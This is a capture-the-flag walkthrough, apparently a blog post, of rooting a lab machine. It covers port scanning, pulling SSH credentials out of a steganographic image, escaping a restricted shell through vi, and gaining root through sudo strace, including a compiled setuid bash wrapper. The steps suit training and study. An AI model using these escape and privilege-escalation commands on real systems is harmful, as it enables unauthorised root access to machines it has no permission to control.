using namp to do a port scanning

1
nmap -p 1-65535 -T4 -A -v 192.168.227.157

1

check its http service(port 31337)

2

download the key_is_h1dd3n.jpg, check with binwalk and exiftool but get nothing. try if it is stegnographed.

8

extract out a h1dd3n.txt using key “h1dd3n”

the content of txt seems to be brainfuck, decode it here: https://www.splitbrain.org/_static/ook/

3

looks like a pair of credential. username: ud64, password: 1M!#64@ud

login to its sshd service(port 1337)

4

the shell is restricted, hit TAB twice and get to see the command I am allowed to execute.

vi is always our best friends to escape restricted shell environment.

vi -> !/bin/bash -> escaped.

5

sysud64 is just strace.google “strace suid local privilege escalation” and get this:

path 1

1
sudo strace -o/dev/null /bin/bash

6

path 2

write a c program:

1
2
3
4
5
6
7
#include <stdlib.h>
#include <unistd.h>

int main() {
setuid(0);
system("/bin/bash");
}

compile it, then

1
2
3
sudo strace chown root:root test
sudo strace chmod u+s test
./test

7